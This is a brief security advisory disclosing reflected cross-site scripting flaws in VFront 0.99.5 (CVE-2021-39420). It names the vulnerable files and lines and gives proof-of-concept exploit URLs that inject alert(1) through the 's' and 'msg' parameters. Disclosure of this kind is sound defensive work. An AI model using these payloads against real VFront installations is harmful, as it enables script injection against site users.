Cross site scripting in VFront v0.99.5

Multiple cross site scripting vulnerabilities are present in VFront 0.99.5. The following is detailed information about these vulnerabilities:

file: search_all.php
line: 104
exploit: http://localhost/vfront-0.99.51/search_all.php?s=%22alert(1);

file: add.attach.php
line: 351
exploit: http://localhost/vfront-0.99.51/add.attach.php?feed=ko&id=1&t=tabella&msg=alert(1);
Notes: the parameter 't' must be the name of an existing table inside the database managed by vfront.

Above vulnerabilities are published at CVE-2021-39420

This vulnerability was detected as part of the DARPA CHESS program